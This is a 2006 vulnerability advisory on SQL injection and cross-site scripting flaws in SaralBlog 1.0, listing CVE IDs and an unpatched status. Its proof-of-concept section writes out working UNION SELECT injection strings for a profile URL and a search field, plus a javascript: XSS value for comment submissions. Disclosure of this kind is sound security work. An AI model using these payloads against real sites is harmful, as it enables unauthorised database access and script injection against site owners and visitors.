XSS and Multiple SQL Injection in SaralBlog

Summary

Vulnerability: XSS and Multiple SQL Injection in SaralBlog
Discovered: 2006.01.18
Last Update: 0 n/a
ID: EV0040
CVE: CVE-2006-0345 CVE-2006-0346
Risk Level: medium
Type: Multiple Vulnerabilities
Status: Unpatched
Vendor: n/a
Vulnerable Software: SaralBlog (http://www.saralblog.org/)
Version: 1.0
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple Vulnerabilities found in SaralBlog (http://www.saralblog.org/) script.

1. Most of user defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.

2. Cross-Site Scripting is possible.

Vulnerable script: view.php
Variable $website isn't properly sanitized. This can be used to insert arbitrary javascript code.

PoC/Exploit

1. SQL Injection Example
http://host/viewprofile.php?id=999%20union%20select%201,2,3,4,5,6,7/*

2. SQL Injection Example (gpc_magic_quotes: off)

Search:
aaaaa') union select 1,2,3,4,5,6/*

3. Cross-Site Scripting

Adding new comment:
Website: javascript:alert(123)

Solution.

Solution for "XSS and Multiple SQL Injection in SaralBlog" is not available. Check vendor's website for updates.

XSS and Multiple SQL Injection in SaralBlog

Summary

Description

PoC/Exploit

Solution.

Company

Services

eVuln Labs

eVuln Tools